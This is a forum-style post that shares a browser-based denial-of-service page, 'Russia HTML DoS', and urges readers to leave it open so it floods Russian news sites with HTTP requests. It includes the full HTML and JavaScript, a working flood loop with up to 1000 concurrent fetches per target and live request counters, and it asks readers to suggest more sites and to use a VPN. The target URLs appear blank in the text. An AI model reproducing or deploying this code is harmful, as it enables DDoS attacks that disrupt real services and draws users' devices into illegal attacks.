Kills (Some sites may firewall to only Russian IP access - but that's the best we can do):
- Last updated at 9:40PM UTC
EDIT: I have been keeping the code down below up to date with the most recent sites, ( uses the same code), if you have any suggestions, ie - any sites that I don't already have listed, please comment or chat me!
Visiting will spam Russian sites with HTTP requests, causing their sites to slog, and best case, crash, if there's enough load. Leaving the page open will use your device's resources to constantly spam those sites.
VPN is not required, but recommended!
I've reformatted (95% of all work comes from them) into an easier URL @
It can be run locally with any browser or via those URLs, with any browser.
<!-- saved from url=(0021) --> <html> <head><meta http-equiv="Content-Security-Policy" content="*"> <title>Russia HTML DoS</title> </head> <body> <p>Reformated from</p> <h1>Russia HTML DoS</h1> <h3>English version</h3> <p>For security concerns, you are able to simply save the webpage, and run locally - as well as view the source. It is entirely HTML and browser interpreted.</p> <p>The "official" news in russian federation are all fake and we believe it is better to shut them down!</p> <p>Please, just open this page and let it be open on your devices, it will flood the web-sites and pose a huge load on their infrastructure</p> <h3>Русская версия</h3> <p>"Официальные" новости в рф - это театр абсурда и мы считаем, что это нужно остановить!</p> <p>Пожалуйста, просто откройте эту страницу на своём компьютере и оставтье вкладку открытой, она будет автоматически нагружать сайты российской пропаганды.</p> <h3>Українська версія</h3> <p>Офіційні новини в рф - це театр абсурду і ми вважаємо, що це треба зупинити!</p> <p>Будь ласка, просто залиште відкритою цю сторінку на своєму комп'ютері щоб вона автоматично навантажувала сайти російської пропаганди.</p> <h3>Here is the stats of your session (the links and the number of the requests that were sent from your browser):</h3> <h3>Failed to fetch is normal - if any site has that - that means their servers are under load and are dropping packets - which is the goal!</h3> <div id="stats"><pre>{ "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" }, "": { "number_of_requests": 0, "number_of_errored_responses": 0, "error_message": "Failed to fetch" } }</pre></div> <div id="errors"></div> <p>If you missed it, <a href="">BBC NEWS: Ukraine conflict: Russian forces attack from three sides</a></p> <script> var targets = { '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, '': { number_of_requests: 0, number_of_errored_responses: 0 }, } var statsEl = document.getElementById('stats'); function printStats() { statsEl.innerHTML = '<pre>' + JSON.stringify(targets, null, 2) + '</pre>' } setInterval(printStats, 1000); var CONCURRENCY_LIMIT = 1000 var queue = [] async function fetchWithTimeout(resource, options) { const controller = new AbortController(); const id = setTimeout(() => controller.abort(), options.timeout); return fetch(resource, { signal: controller.signal }).then((response) => { clearTimeout(id); return response; }).catch((error) => { clearTimeout(id); throw error; }); } async function flood(target) { for (var i = 0;; ++i) { if (queue.length > CONCURRENCY_LIMIT) { await queue.shift() } queue.push( fetchWithTimeout(target, { timeout: 1000 }) .catch((error) => { if (error.code === 20 /* ABORT */) { return; } targets[target].number_of_errored_responses++; targets[target].error_message = error.message }) .then((response) => { if (response && !response.ok) { targets[target].number_of_errored_responses++; targets[target].error_message = response.statusText } targets[target].number_of_requests++; }) ) } } // Start Object.keys(targets).map(flood) </script> </body></html>
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